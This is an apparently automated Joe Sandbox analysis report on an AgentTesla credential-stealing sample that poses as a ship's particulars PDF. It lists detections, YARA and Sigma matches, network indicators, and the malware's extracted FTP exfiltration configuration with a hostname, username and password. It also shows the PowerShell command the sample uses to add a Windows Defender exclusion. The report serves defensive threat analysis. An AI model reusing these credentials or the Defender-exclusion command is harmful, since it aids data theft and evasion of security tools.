Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MV BBG MUARA Ship's Particulars.pdf.scr.exe

Overview

General Information

Sample name:MV BBG MUARA Ship's Particulars.pdf.scr.exe
Analysis ID:1560137
MD5:1779ee90e122ebe86f1bddc4ec06440d
SHA1:e8842b83a180e7589e366bd61b08f59a87a71734
SHA256:941559a78b6e1caf39212048e7f62723e5f283d1942858cc07a339d6d6b24362
Tags:exeuser-threatcat_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • MV BBG MUARA Ship's Particulars.pdf.scr.exe (PID: 6712 cmdline: "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe" MD5: 1779EE90E122EBE86F1BDDC4EC06440D)
    • powershell.exe (PID: 3288 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://beirutrest.com", "Username": "belogs@beirutrest.com", "Password": "9yXQ39wz(uL+"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.4188253761.0000000002D5C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000004.00000002.4186764037.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.4186764037.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000004.00000002.4188253761.0000000002D31000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000004.00000002.4188253761.0000000002D31000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x312d3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x31345:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x313cf:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x31461:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x314cb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x3153d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x315d3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x31663:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                • 0x2e6c6:$s2: GetPrivateProfileString
                • 0x2ddc5:$s3: get_OSFullName
                • 0x2f403:$s5: remove_Key
                • 0x2f592:$s5: remove_Key
                • 0x30473:$s6: FtpWebRequest
                • 0x312b5:$s7: logins
                • 0x31827:$s7: logins
                • 0x3450a:$s7: logins
                • 0x345ea:$s7: logins
                • 0x35ee6:$s7: logins
                • 0x35184:$s9: 1.85 (Hash, version 2, native byte-order)
                0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 17 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe", ParentImage: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe, ParentProcessId: 6712, ParentProcessName: MV BBG MUARA Ship's Particulars.pdf.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe", ProcessId: 3288, ProcessName: powershell.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe", ParentImage: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe, ParentProcessId: 6712, ParentProcessName: MV BBG MUARA Ship's Particulars.pdf.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe", ProcessId: 3288, ProcessName: powershell.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe", ParentImage: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe, ParentProcessId: 6712, ParentProcessName: MV BBG MUARA Ship's Particulars.pdf.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe", ProcessId: 3288, ProcessName: powershell.exe

                  Suricata Signatures

                  No Suricata rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://beirutrest.com", "Username": "belogs@beirutrest.com", "Password": "9yXQ39wz(uL+"}
                  Multi AV Scanner detection for submitted file
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exeReversingLabs: Detection: 47%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for sample
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exeJoe Sandbox ML: detected
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49735 version: TLS 1.2
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 4x nop then jmp 06C99175h0_2_06C991BC

                  Networking

                  barindex
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.raw.unpack, type: UNPACKEDPE
                  Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                  Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                  Source: Joe Sandbox ViewIP Address: 50.87.144.157 50.87.144.157
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownDNS query: name: api.ipify.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                  Source: global trafficDNS traffic detected: DNS query: beirutrest.com
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4188253761.0000000002D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://beirutrest.com
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4192547572.000000000641A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1820131384.00000000025BA000.00000004.00000800.00020000.00000000.sdmp, MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4188253761.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exeString found in binary or memory: http://tempuri.org/ianiDataSet.xsd
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exeString found in binary or memory: http://tempuri.org/ianiDataSet1.xsd
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exeString found in binary or memory: http://tempuri.org/ianiDataSet2.xsdM
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1822825090.0000000004EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.comhs
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1820711879.0000000003569000.00000004.00000800.00020000.00000000.sdmp, MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4186764037.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1820711879.0000000003569000.00000004.00000800.00020000.00000000.sdmp, MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4186764037.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4188253761.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4188253761.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4188253761.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                  Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49735 version: TLS 1.2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 4.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: MV BBG MUARA Ship's Particulars.pdf.scr.exe
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 0_2_00B5D51C0_2_00B5D51C
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 0_2_06C9AF010_2_06C9AF01
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 0_2_06C91E700_2_06C91E70
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 0_2_06C94E300_2_06C94E30
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 0_2_06C952680_2_06C95268
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 0_2_06C971E80_2_06C971E8
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 0_2_06C949F80_2_06C949F8
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 0_2_06C969000_2_06C96900
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 0_2_06C969100_2_06C96910
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 4_2_051EE5B84_2_051EE5B8
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 4_2_051EDD384_2_051EDD38
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 4_2_051E3E404_2_051E3E40
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 4_2_051E4A584_2_051E4A58
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 4_2_051EAA9A4_2_051EAA9A
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 4_2_051E41884_2_051E4188
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 4_2_069089704_2_06908970
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 4_2_0690B5F84_2_0690B5F8
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 4_2_06917D804_2_06917D80
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 4_2_069155A04_2_069155A0
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 4_2_069165F04_2_069165F0
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 4_2_0691B2384_2_0691B238
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 4_2_069130604_2_06913060
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 4_2_0691C1904_2_0691C190
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 4_2_069176A04_2_069176A0
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 4_2_06915CE34_2_06915CE3
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 4_2_0691E3A84_2_0691E3A8
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 4_2_069100404_2_06910040
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 4_2_069100064_2_06910006
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeCode function: 4_2_0691055C4_2_0691055C
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1820131384.00000000025C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs MV BBG MUARA Ship's Particulars.pdf.scr.exe
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1822920441.00000000050B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs MV BBG MUARA Ship's Particulars.pdf.scr.exe
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000000.1718857892.0000000000120000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameGfhv.exe4 vs MV BBG MUARA Ship's Particulars.pdf.scr.exe
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823913098.00000000070F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs MV BBG MUARA Ship's Particulars.pdf.scr.exe
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1819458942.00000000007C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs MV BBG MUARA Ship's Particulars.pdf.scr.exe
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1820711879.0000000003569000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename2ee75d06-d489-4537-90fc-92fe0f559436.exe4 vs MV BBG MUARA Ship's Particulars.pdf.scr.exe
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1820711879.0000000003569000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs MV BBG MUARA Ship's Particulars.pdf.scr.exe
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1820131384.00000000025BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename2ee75d06-d489-4537-90fc-92fe0f559436.exe4 vs MV BBG MUARA Ship's Particulars.pdf.scr.exe
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4186764037.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename2ee75d06-d489-4537-90fc-92fe0f559436.exe4 vs MV BBG MUARA Ship's Particulars.pdf.scr.exe
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4186955073.0000000000BF9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs MV BBG MUARA Ship's Particulars.pdf.scr.exe
